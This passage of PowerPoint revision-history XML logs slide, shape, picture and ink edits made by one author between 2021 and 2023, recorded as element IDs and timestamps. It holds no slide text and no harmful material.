          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3229862276" sldId="275"/>
            <ac:cxnSpMk id="12" creationId="{A9DAD7F3-751C-4B10-9CC1-9AF851D8FB3F}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{B48E888A-ADA7-48DF-89BA-83203E0D5008}" dt="2021-05-06T20:42:29.605" v="279"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1874066169" sldId="276"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{B48E888A-ADA7-48DF-89BA-83203E0D5008}" dt="2021-05-06T20:40:28.586" v="276" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1874066169" sldId="276"/>
            <ac:spMk id="2" creationId="{F5674469-AE43-4905-B796-CBD6163547A8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{B48E888A-ADA7-48DF-89BA-83203E0D5008}" dt="2021-05-06T20:40:28.586" v="276" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1874066169" sldId="276"/>
            <ac:spMk id="3" creationId="{5776F233-A332-43DD-88E0-2D4FA634304F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{B48E888A-ADA7-48DF-89BA-83203E0D5008}" dt="2021-05-06T20:42:21.829" v="277" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1874066169" sldId="276"/>
            <ac:spMk id="4" creationId="{1096E728-F0FC-4A97-9DC4-AF916418F7F8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{B48E888A-ADA7-48DF-89BA-83203E0D5008}" dt="2021-05-06T20:42:21.829" v="277" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1874066169" sldId="276"/>
            <ac:spMk id="5" creationId="{E8054F9E-AED0-47B5-9F08-DF1B217DC346}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{B48E888A-ADA7-48DF-89BA-83203E0D5008}" dt="2021-05-06T20:42:22.864" v="278" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1874066169" sldId="276"/>
            <ac:picMk id="7" creationId="{69EECC3D-F466-48FC-9756-3A0A0DC825F0}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{B48E888A-ADA7-48DF-89BA-83203E0D5008}" dt="2021-05-06T20:46:49.440" v="298" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4086215798" sldId="277"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{B48E888A-ADA7-48DF-89BA-83203E0D5008}" dt="2021-05-06T20:43:00.577" v="282"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4086215798" sldId="277"/>
            <ac:spMk id="2" creationId="{1F42CDAF-463E-49C9-80F9-495CA4E628E6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{B48E888A-ADA7-48DF-89BA-83203E0D5008}" dt="2021-05-06T20:46:43.162" v="297" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4086215798" sldId="277"/>
            <ac:spMk id="5" creationId="{F93E158B-C86D-4CF7-B081-8E1A0492AC4C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{B48E888A-ADA7-48DF-89BA-83203E0D5008}" dt="2021-05-06T20:46:49.440" v="298" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4086215798" sldId="277"/>
            <ac:picMk id="1026" creationId="{34332086-1B15-44D7-BEF7-8FCFADAFC95A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}"/>
    <pc:docChg chg="undo redo custSel addSld delSld modSld sldOrd">
      <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:58:03.121" v="7872" actId="14100"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:26:18.068" v="7102" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1323245308" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-07-20T14:27:33.907" v="30" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1323245308" sldId="256"/>
            <ac:spMk id="2" creationId="{B476BAF9-88AC-4600-B511-347782B9C875}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T23:26:18.068" v="7102" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1323245308" sldId="256"/>
            <ac:spMk id="3" creationId="{58CD3106-2EE0-40F4-8C0B-042135FF9FB4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-08-03T18:41:44.520" v="1019" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1323245308" sldId="256"/>
            <ac:picMk id="1026" creationId="{23848793-1268-A8F6-B9C9-B01BF629719C}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T15:15:12.198" v="3095" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="166110846" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-07-20T14:28:51.561" v="39" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="166110846" sldId="257"/>
            <ac:spMk id="2" creationId="{CE55460C-BE1A-B2BD-8120-3C6D7C403B3F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T15:15:12.198" v="3095" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="166110846" sldId="257"/>
            <ac:spMk id="3" creationId="{030EFCF8-B749-87AF-8B9A-B94F01C83BA9}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-07-20T14:26:49.385" v="2" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="870868014" sldId="257"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-07-20T14:26:47.921" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2896575825" sldId="258"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new del mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T15:02:55.440" v="3020" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3486325311" sldId="258"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-07-20T14:29:40.086" v="80" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3486325311" sldId="258"/>
            <ac:spMk id="2" creationId="{A10816AA-1FCB-F475-7624-C8F176FEDEE5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-07-20T14:29:40.086" v="80" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3486325311" sldId="258"/>
            <ac:spMk id="3" creationId="{6C0594D2-8AC7-61BF-4000-1472D65F591E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-07-20T14:32:30.558" v="87" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3486325311" sldId="258"/>
            <ac:spMk id="4" creationId="{157956CE-1556-C49E-40B0-4955411E6DE2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-07-20T14:42:48.425" v="133" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3486325311" sldId="258"/>
            <ac:spMk id="7" creationId="{4DA69A73-1C10-18A6-C386-4D0E713C40AD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-07-20T14:42:31.033" v="113" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3486325311" sldId="258"/>
            <ac:picMk id="6" creationId="{963DC275-D237-5A75-5145-256E156B093B}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-07-20T14:26:48.636" v="1" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="40733756" sldId="259"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod ord modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T01:45:26.137" v="4862" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="889922522" sldId="259"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-07-20T14:33:59.165" v="89" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="889922522" sldId="259"/>
            <ac:spMk id="2" creationId="{7AA76F15-6D7D-2426-9561-8256525C48E9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-07-20T14:39:10.767" v="110" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="889922522" sldId="259"/>
            <ac:spMk id="11" creationId="{9143243B-59F3-9E0D-50F0-080A00874F40}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T01:38:35.946" v="4654" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="889922522" sldId="259"/>
            <ac:spMk id="12" creationId="{E2A4E9DF-73B6-33F2-5D5D-94CCA6464176}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-07-20T14:43:28.072" v="154" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="889922522" sldId="259"/>
            <ac:spMk id="14" creationId="{4C2BF493-F611-A5FC-CBAD-AE20C463C0E1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T01:40:25.692" v="4793" actId="113"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="889922522" sldId="259"/>
            <ac:spMk id="15" creationId="{D6124978-F721-6319-21C9-B32A3D72F86C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T01:41:47.241" v="4818" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="889922522" sldId="259"/>
            <ac:spMk id="26" creationId="{C2109843-5707-3C09-B093-3B8CFA25B423}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T01:42:22.020" v="4823" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="889922522" sldId="259"/>
            <ac:spMk id="27" creationId="{6FAF9160-342D-C1DD-E7F6-666C0452964B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T01:45:26.137" v="4862" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="889922522" sldId="259"/>
            <ac:spMk id="31" creationId="{95E9BD74-8865-C83E-A054-C000533AFE97}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T01:40:59.852" v="4799"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="889922522" sldId="259"/>
            <ac:grpSpMk id="19" creationId="{91D29B35-BD31-1670-9E1F-48FBFC64F7ED}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T01:40:59.852" v="4799"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="889922522" sldId="259"/>
            <ac:grpSpMk id="21" creationId="{369865C3-C5B8-6FE0-67EC-65C8FE79AFC2}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T01:41:08.769" v="4803"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="889922522" sldId="259"/>
            <ac:grpSpMk id="25" creationId="{DCDEEEC6-E543-EBA5-10A8-42AE04E9DD87}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T01:44:51.454" v="4826"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="889922522" sldId="259"/>
            <ac:grpSpMk id="30" creationId="{62179423-740D-BE40-246F-CD8795EE007B}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T01:32:55.231" v="4520" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="889922522" sldId="259"/>
            <ac:picMk id="3" creationId="{DE3638A4-D553-B04A-CAAB-80732E04077F}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-19T21:04:18.100" v="4457" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="889922522" sldId="259"/>
            <ac:picMk id="4" creationId="{9539615D-CAF2-69A9-A4D2-BAA76106BC56}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T01:32:52.554" v="4519" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="889922522" sldId="259"/>
            <ac:picMk id="5" creationId="{E4334B01-5B31-F557-EA67-5E6146E98A47}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T01:34:13.066" v="4523" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="889922522" sldId="259"/>
            <ac:picMk id="6" creationId="{36687060-AED9-41DF-8AC4-03CC7EE0B42D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T01:38:35.946" v="4654" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="889922522" sldId="259"/>
            <ac:picMk id="8" creationId="{258DE9AE-43B0-8C3A-6E9E-7C80620A188C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-07-20T14:37:14.393" v="103" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="889922522" sldId="259"/>
            <ac:picMk id="8" creationId="{E8B5433F-2A6A-97E5-645E-0599F1B80BF8}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T01:34:13.769" v="4524" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="889922522" sldId="259"/>
            <ac:picMk id="10" creationId="{375C190D-5AC8-C9DE-6A03-D7A0AB8087C7}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T01:38:39.534" v="4655" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="889922522" sldId="259"/>
            <ac:picMk id="11" creationId="{CAB10372-97A2-B79D-ACD1-2495AA5C002C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T01:42:17.813" v="4822" actId="732"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="889922522" sldId="259"/>
            <ac:picMk id="16" creationId="{325B142D-03DF-143E-7881-E08ED651471C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T01:40:59.852" v="4799"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="889922522" sldId="259"/>
            <ac:inkMk id="17" creationId="{DB3BC0E1-1A63-AF5C-1DA4-9D7A43A136A4}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T01:40:59.852" v="4799"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="889922522" sldId="259"/>
            <ac:inkMk id="18" creationId="{606C8036-D9F9-EBD9-E26E-43F8232127AB}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T01:40:59.852" v="4799"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="889922522" sldId="259"/>
            <ac:inkMk id="20" creationId="{6AAB30A2-AB8C-C899-22B0-8317E632B5BD}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T01:41:03.797" v="4800" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="889922522" sldId="259"/>
            <ac:inkMk id="22" creationId="{3B562B81-2400-E128-6E0D-92FDEBB75D5C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T01:41:08.769" v="4803"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="889922522" sldId="259"/>
            <ac:inkMk id="23" creationId="{BFE2CFBF-3392-DC22-CE7F-F5148F53862D}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T01:41:08.769" v="4803"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="889922522" sldId="259"/>
            <ac:inkMk id="24" creationId="{447A3597-07DC-C994-FCE0-30EB37D75AC3}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T01:44:51.454" v="4826"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="889922522" sldId="259"/>
            <ac:inkMk id="28" creationId="{53247ADB-18FC-34E5-7C4B-C39FFC202DDD}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T01:44:51.454" v="4826"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="889922522" sldId="259"/>
            <ac:inkMk id="29" creationId="{38A7C7CB-FEDC-0EEC-79E8-E7107F4F6512}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:cxnChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T01:40:44.097" v="4794" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="889922522" sldId="259"/>
            <ac:cxnSpMk id="13" creationId="{85329CF1-FB34-8686-1E68-EFD1A3622497}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2022-07-20T14:26:49.730" v="3" actId="47"/>
        <pc:sldMkLst>
